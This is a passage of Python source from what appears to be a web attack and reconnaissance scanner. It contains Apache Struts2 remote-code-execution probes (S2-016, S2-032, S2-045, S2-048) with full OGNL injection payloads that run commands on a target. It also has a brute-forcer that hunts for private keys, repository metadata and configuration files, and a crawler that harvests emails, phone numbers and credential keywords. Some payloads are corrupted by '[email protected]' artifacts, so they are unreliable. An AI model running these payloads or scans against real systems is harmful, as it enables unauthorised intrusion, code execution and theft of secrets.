                urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError):
            pass
        except (UnboundLocalError, AttributeError):
            pass
        except Exception as e:
            logging.exception(host)
            logging.exception(e)
        # make sure the streamed response is released on every path
        try:
            r.close()
        except:
            pass
        return 'OK'

    def save(self, urls):
        Sqldb(self.dbname).get_urls(urls)

    def run(self, task):
        try:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=THREADS) as executor:
                futures = [executor.submit(self.scan, i) for i in task]
                for future in concurrent.futures.as_completed(futures,
                                                              timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass

    # build and launch the scan tasks
    def pool(self):
        host = self.host.strip('/')
        self.check404(host)
        task = []
        urls = self.get_urls(host)
        random.shuffle(urls)
        for url in urls:
            task.append(host + url)
        self.run(task)
        # persist the results
        self.save(self.outjson)
class struts():
    """Apache Struts2 RCE checks (S2-016/032/045/048).

    Each probe executes 'echo <random int>' on the target and looks for
    the random marker in a short response.

    NOTE(review): several OGNL payload strings below contain the literal
    text '[email protected]' — an email-obfuscation artifact that replaced
    the original '@ognl.OgnlContext@' / '@java.lang.Runtime@' class
    references.  They are preserved byte-for-byte here, but these probes
    cannot work until the payloads are restored from a clean upstream copy.
    """

    def __init__(self, ip):
        self.url = ip
        self.result = []
        # random marker echoed by the injected command
        self.random = random.randint(100000000, 200000000)
        self.win = 'set /a ' + str(self.random)
        self.linux = 'echo ' + str(self.random)
        self.timeout = 3
        self.req = Requests()

    def st016(self):
        # S2-016: redirect: prefix OGNL injection; marker leaks into Location
        payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D"
        try:
            r = self.req.get(self.url + payload)
            if str(self.random) in r.headers['Location'] and len(
                    r.headers['Location']) < 15:
                self.result.append('Apache S2-016 Vulnerability: ' + self.url)
        except:
            pass

    def st032(self):
        # S2-032: method: prefix OGNL injection; marker printed in the body
        payload = r"/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format(
            self.linux)
        try:
            r = self.req.get(self.url + payload)
            if str(self.random) in r.text and len(r.text) < 11:
                self.result.append('Apache S2-032 Vulnerability: ' + self.url)
        except:
            pass

    def st045(self):
        # S2-045: OGNL injection via the Content-Type header
        try:
            cmd = self.linux
            header = dict()
            header[
                "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header[
                "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = request.Request(self.url, headers=header)
            text = request.urlopen(r).read()
        except http.client.IncompleteRead as e:
            # a truncated body still may contain the marker
            text = e.partial
        except:
            pass
        # 'text' only exists when a response (even partial) was read
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-045 Vulnerability: ' + self.url)

    def st048(self):
        # S2-048: OGNL injection via struts2-showcase saveGangster.action
        cmd = self.linux
        payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%[email protected]@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%[email protected]@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%29.%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123"
        payload = payload.encode('utf-8')
        try:
            r = request.urlopen(self.url + '/integration/saveGangster.action',
                                payload)
            text = r.read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-048 Vulnerability: ' + self.url)

    def run(self):
        """Run all probes and return the list of findings."""
        self.st032()
        self.st045()
        self.st016()
        self.st048()
        return self.result
class DirScan():
    """Directory brute-forcer (console variant): fixed wordlist plus
    cartesian backup-name products, similarity-based 404 filtering,
    colourised stdout output."""

    def __init__(self, dbname):
        self.notstr = ''     # body of the 404 baseline page
        self.notlen = ''     # length of the 404 baseline body
        self.goto = ''       # Location header of the 404 baseline redirect
        self.title = ''
        self.dbname = dbname
        self.ext = 'asp,php'  # default extensions to combine with page names
        self.outjson = []
        self.req = Requests()

    def get_urls(self, domain):
        """Assemble the candidate path set for *domain*."""
        domain = domain.replace('http://', '').replace('https://',
                                                       '').rstrip('/')
        ext = self.ext.split(',')
        ext = list(map(lambda x: '.' + x, ext))
        path = [
            "/robots.txt", "/README.md", "/crossdomain.xml", "/.git/config",
            # NOTE(review): missing comma — "/.hg" and "/.git/index" are
            # implicitly concatenated into the single (useless) entry
            # "/.hg/.git/index"; preserved as-is.
            "/.hg" "/.git/index", "/.svn/entries", "/.svn/wc.db",
            "/.DS_Store", "/CVS/Root", "/CVS/Entries",
            "/.idea/workspace.xml", "/nginx_status", "/.mysql_history",
            "/login/", "/phpMyAdmin", "/pma/", "/pmd/", "/SiteServer",
            "/admin/", "/Admin/", "/manage", "/manager/", "/manage/html",
            "/resin-admin", "/resin-doc", "/axis2-admin", "/admin-console",
            "/system", "/wp-admin", "/uc_server", "/debug", "/Conf",
            "/webmail", "/service", "/memadmin", "/owa", "/harbor",
            "/master", "/root", "/xmlrpc.php", "/phpinfo.php", "/zabbix",
            "/api", "/backup", "/inc", "/web.config", "/httpd.conf",
            "/local.conf", "/sitemap.xml", "/app.config", "/.bash_history",
            "/.rediscli_history", "/.bashrc", "/.history", "/nohup.out",
            "/.mysql_history", "/server-status", "/solr/", "/examples/",
            "/examples/servlets/servlet/SessionExample", "/manager/html",
            "/login.do", "/config/database.yml", "/database.yml",
            "/db.conf", "/db.ini", "/jmx-console/HtmlAdaptor", "/cacti/",
            "/jenkins/script", "/memadmin/index.php", "/pma/index.php",
            "/phpMyAdmin/index.php", "/.git/HEAD", "/.gitignore",
            "/.ssh/known_hosts", "/.ssh/id_rsa", "/id_rsa",
            "/.ssh/authorized_keys", "/app.cfg", "/.mysql.php.swp",
            "/.db.php.swp", "/.database.php.swp", "/.settings.php.swp",
            "/.config.php.swp", "/config/.config.php.swp",
            "/.config.inc.php.swp", "/config.inc.php.bak", "/php.ini",
            "/sftp-config.json", "/WEB-INF/web.xml", "/WEB-INF/web.xml.bak",
            "/WEB-INF/config.xml", "/WEB-INF/struts-config.xml",
            "/server.xml", "/config/database.yml",
            "/WEB-INF/database.properties", "/WEB-INF/log4j.properties",
            "/WEB-INF/config/dbconfig", "/fckeditor/_samples/default.html",
            "/ckeditor/samples/", "/ueditor/ueditor.config.js",
            "/javax.faces.resource...%2fWEB-INF/web.xml.jsf",
            "/wp-config.php", "/configuration.php",
            "/sites/default/settings.php", "/config.php", "/config.inc.php",
            "/data/config.php", "/data/config.inc.php",
            "/data/common.inc.php", "/include/config.inc.php",
            "/WEB-INF/classes/", "/WEB-INF/lib/", "/WEB-INF/src/", "/.bzr",
            "/SearchPublicRegistries.jsp", "/.bash_logout",
            "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile",
            "/test2.html", "/conf.ini", "/index.tar.tz", "/index.cgi.bak",
            "/WEB-INF/classes/struts.xml", "/package.rar",
            "/WEB-INF/applicationContext.xml", "/mysql.php", "/apc.php",
            "/zabbix/", "/script", "/editor/ckeditor/samples/",
            "/upfile.php", "/conf.tar.gz",
            "/WEB-INF/classes/conf/spring/applicationContext-datasource.xml",
            "/output.tar.gz", "/.vimrc", "/INSTALL.TXT", "/pool.sh",
            "/database.sql.gz", "/o.tar.gz", "/upload.sh",
            "/WEB-INF/classes/dataBase.properties", "/b.php", "/setup.sh",
            "/db.php.bak", "/WEB-INF/classes/conf/jdbc.properties",
            "/WEB-INF/spring.xml", "/.htaccess",
            "/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp",
            "/.htpasswd", "/id_dsa", "/WEB-INF/conf/activemq.xml",
            "/config/config.php", "/.idea/modules.xml",
            "/WEB-INF/spring-cfg/applicationContext.xml", "/test2.txt",
            "/WEB-INF/classes/applicationContext.xml",
            "/WEB-INF/conf/database_config.properties",
            "/WEB-INF/classes/rabbitmq.xml",
            "/ckeditor/samples/sample_posteddata.php", "/proxy.pac",
            "/sql.php", "/test2.php", "/build.tar.gz",
            "/WEB-INF/classes/config/applicationContext.xml",
            "/WEB-INF/dwr.xml", "/readme", "/phpmyadmin/index.php",
            "/WEB-INF/web.properties", "/readme.html", "/key"
        ]
        # cartesian product: likely backup names x archive extensions
        leaks = Cartesian()
        leaks.add_data([
            '/www', '/1', '/2016', '/2017', '/2018', '/2019', '/wwwroot',
            '/backup', '/index', '/web', '/test', '/tmp', '/default',
            '/temp', '/extra', '/file', '/qq', '/up', '/config',
            '/' + domain
        ])
        leaks.add_data([
            '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar',
            '.txt', '.log', '.tmp', '.gz', '.bak~', '.sh'
        ])
        path.extend(leaks.build())
        # cartesian product: common page names x configured extensions
        index = Cartesian()
        index.add_data([
            '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q',
            '/shell', '/p', '/a', '/userinfo', '/api', '/common', '/web',
            '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma',
            '/66'
        ])
        index.add_data(ext)
        path.extend(index.build())
        return set(path)

    def diff(self, text):
        """Similarity ratio between *text* and the 404 baseline body."""
        result = difflib.SequenceMatcher(None, self.notstr,
                                         text).quick_ratio()
        return result

    def _verify(self, r, goto, title):
        """Heuristic 404 filter: True when the response looks like a
        real page rather than the recorded not-found baseline."""
        result = True
        if r.status_code in BLOCK_CODE:
            result = False
        if r.headers['Content-Type'] in BLOCK_CONTYPE:
            result = False
        if len(r.text) == self.notlen:
            result = False
        if goto == self.goto:
            result = False
        for i in PAGE_404:
            if i in r.text:
                result = False
                break
        if title == self.title and title != 'None':
            result = False
        return result

    def check404(self, url):
        """Request a random page and record the 404 baseline."""
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        url = url + '/' + random_url.decode('utf-8') + '.html'
        try:
            r = self.req.get(url)
            self.notstr = r.text[:10000]
            self.notlen = len(r.text)
            if r.is_redirect:
                self.goto = r.headers['Location']
        except Exception as e:
            logging.exception(e)

    def scan(self, host):
        """Request one candidate url; print and record it when it passes
        the 404 heuristics and differs enough from the baseline."""
        try:
            r = self.req.get(host)
            if r.is_redirect:
                goto = r.headers['Location']
            else:
                goto = 'test'
            if r.headers['Content-Type']:
                contype = re.sub('\w+/', '', str(r.headers['Content-Type']))
                contype = re.sub(';.*', '', contype)
            else:
                contype = 'None'
            text = r.text[:10000]
            title = re.search('(?<=<title>).*(?=</title>)', text)
            if self._verify(r, goto, title):
                if contype == 'html':
                    # similarity against the 404 baseline body
                    result = self.diff(text)
                else:
                    result = 0
                if result < 0.8:
                    if title == None:
                        title = 'None'
                    else:
                        title = title.group()
                        title = re.sub(r'\n|\t', '', title)
                    urlresult = parse.urlparse(host)
                    sys.stdout.write(bcolors.OKGREEN +
                                     '[+] {}{:^12}{:^14}\t{:^18}\t{:^8}\n'.format(
                                         r.status_code, len(r.text), title,
                                         contype, str(r.url)) + bcolors.ENDC)
                    data = {
                        urlresult.netloc: {
                            "rsp_code": r.status_code,
                            "rsp_len": len(r.text),
                            "title": title,
                            "contype": contype,
                            "url": urlresult.path
                        }
                    }
                    self.outjson.append(data)
        except Exception as e:
            pass
        return 'OK'

    def save(self, urls):
        Sqldb(self.dbname).get_urls(urls)

    def run(self, task):
        print(bcolors.RED + 'URLS:' + bcolors.ENDC)
        with concurrent.futures.ThreadPoolExecutor(
                max_workers=THREADS) as executor:
            futures = [executor.submit(self.scan, i) for i in task]
            for future in concurrent.futures.as_completed(futures):
                future.result()
        self.save(self.outjson)

    # build and launch the scan tasks
    def pool(self, host):
        self.check404(host)
        task = []
        urls = self.get_urls(host)
        for url in urls:
            task.append(host + url)
        self.run(task)
def start(url):
    """Run the full reconnaissance pipeline against a single target *url*.

    Resolves host/IP and geo information, probes the site over HTTP,
    fingerprints the web application and WAF, gathers passive DNS and
    reverse-IP data, port-scans non-CDN hosts, detects the OS, persists
    everything with web_save() and finally launches the vulnerability and
    (optionally) directory scans.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
    sys.stdout.write(bcolors.RED + 'Host: ' + host + '\n' + bcolors.ENDC)
    sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC)
    address = geoip(ipaddr)
    # Probe the main URL once to see whether the site is reachable.
    # `r` staying None marks an unreachable host -- clearer and less fragile
    # than the original `'r' in locals().keys()` introspection.
    r = None
    try:
        req = Requests()
        r = req.get(url)
    except Exception:
        # Unreachable hosts still get the passive checks below.
        pass
    if r is not None:
        wafresult = checkwaf(host)
        try:
            # Best-effort charset detection before fingerprinting the page.
            coding = chardet.detect(r.content).get('encoding')
            r.encoding = coding
            webinfo = (WebPage(r.url, r.text, r.headers).info())
        except Exception:
            webinfo = {}
        if webinfo:
            sys.stdout.write(bcolors.RED + "Webinfo:\n" + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] Title: {}\n'.format(webinfo.get('title')) + bcolors.ENDC)
            sys.stdout.write(
                bcolors.OKGREEN + '[+] Fingerprint: {}\n'.format(webinfo.get('apps')) + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] Server: {}\n'.format(webinfo.get('server')) + bcolors.ENDC)
            sys.stdout.write(bcolors.OKGREEN + '[+] WAF: {}\n'.format(wafresult) + bcolors.ENDC)
    else:
        webinfo = {}
        wafresult = 'None'
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns})
    webinfo.update({"reverseip": reverseip})
    # Port-scan only hosts that do not appear to sit behind a CDN.
    if iscdn(host):
        open_port = ScanPort(url).pool()
    else:
        open_port = ['CDN:0']
    osname = osdetect(host)
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    web_save(data)
    Vuln(host, open_port, webinfo.get('apps')).run()
    # Directory brute-force only when the probe succeeded and SCANDIR is off.
    if r is not None and not SCANDIR:
        dirscan = DirScan('result')
        dirscan.pool(url)
class Crawl:
    """Single-host crawler.

    Collects same-domain links, candidate JavaScript files (handed to
    JsLeaks), and sensitive data leaked in page bodies and HTML comments
    (emails, phone numbers, IPs, credential-looking keywords), then
    persists the findings through Sqldb.
    """

    def __init__(self, host, dbname):
        self.urls = []      # same-domain links discovered so far
        self.js = []        # candidate JS files for the JsLeaks checker
        self.domain = ''    # netloc of the first successfully parsed page
        self.dbname = dbname
        self.host = host
        self.result = []    # human-readable findings
        self.req = Requests()

    def jsparse(self, r):
        """Collect non-library ``<script src=...>`` URLs from a response."""
        try:
            html = etree.HTML(r.text)
            result = html.xpath('//script/@src')
            for i in result:
                # Skip well-known libraries, trackers and data-URI noise.
                if not re.search(
                        r'jquery|bootstrap|adsbygoogle|angular|javascript|#|vue|react|51.la/=|map\.baidu\.com|canvas|cnzz\.com|slick\.js|autofill-event\.js|tld\.js|clipboard|Chart\.js',
                        i):
                    if '://' not in i:
                        # Relative src -> absolute URL on the crawled host.
                        i = re.sub(r'^/|^\.\./', '', i)
                        i = self.host + '/' + i
                    self.js.append(i)
        # BUGFIX: the original tuple listed AttributeError twice
        # (``(AttributeError, AttributeError, ValueError)``); deduplicated.
        except (AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

    def extr(self, url, body):
        """Mine *body* for leaked data; append findings to ``self.result``."""
        # Extract e-mail addresses from the HTML body
        email = re.findall(
            r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Email: ' + x, email)))
        # Extract Chinese mobile phone numbers from the HTML body
        phone = re.findall(
            r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b',
            body)
        if phone:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Phone: ' + x, phone)))
        # Extract IP addresses hidden inside HTML comments
        ipaddr = re.findall(
            r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)',
            body)
        if ipaddr:
            self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr)))
        # Extract http(s) links hidden inside HTML comments
        links = re.findall(
            r'(?<=<!--).{0,120}((?:http|https):[\w\./\?\-=&]+).{0,120}(?=-->)',
            body)
        if links:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links)))
        # Extract anchor hrefs hidden inside HTML comments
        links2 = re.findall(
            r'(?<=<!--).{0,120}a\shref="([\-\w\.\?:=\&/]+)".{0,120}(?=-->)',
            body)
        if links2:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links2)))
        # Extract credential-looking keywords hidden inside HTML comments
        links3 = re.findall(
            r'(?<=<!--).{0,120}\b(?:usr|pwd|uname|uid|file|upload|manager|webadmin|backup|account|admin|password|pass|user|login|secret|private|crash|root|xxx|fix|todo|secret_key|token|auth_token|access_token|username|authkey|user_id|userid|apikey|api_key|sid|eid|passwd|session_key|SESSION_TOKEN|api_token|access_token_secret|private_key|DB_USERNAME|oauth_token|api_secret_key|备注|笔记|备份|后台|登陆|管理|上传|下载|挂马|挂链)\b.{0,120}(?=-->)',
            body)
        if links3:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links3)))

    def parse_html(self, host):
        """Fetch *host*, harvest JS/leaks, return new same-domain links."""
        try:
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.url, r.text)
            urlparse = parse.urlparse(host)
            domain = urlparse.netloc
            if not self.domain:
                # First page parsed defines the crawl's domain scope.
                self.domain = domain
            html = etree.HTML(r.text)
            result = html.xpath('//a/@href')
            for link in result:
                # NOTE(review): 'mail*' matches 'mai' + zero-or-more 'l';
                # 'mailto' was probably intended -- left unchanged.
                if not re.search('#|mail*|^/$|javascript', link):
                    if 'http' not in link:
                        if urlparse.netloc:
                            link = urlparse.scheme + '://' + urlparse.netloc + '/' + link
                        else:
                            link = 'http://' + host + '/' + link
                    if domain in link:
                        # Skip parameterised URLs to limit crawl explosion.
                        if '=' not in link:
                            self.urls.append(link)
        except (UnboundLocalError, AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)
        self.urls = dedup_url(self.urls)
        return list(set(self.urls))

    def pool(self):
        """Crawl the start page, then all discovered links concurrently,
        run the JS leak checker and store the de-duplicated results."""
        result = self.parse_html(self.host)
        try:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=30) as executor:
                futures = [executor.submit(self.parse_html, i) for i in result]
                for future in concurrent.futures.as_completed(futures,
                                                              timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)
        jslink = JsLeaks().pool(self.js)
        self.result.extend(jslink)
        self.result = list(set(self.result))
        for i in self.result:
            console('Crawl', self.host, i + '\n')
        Sqldb(self.dbname).get_crawl(self.domain, self.result)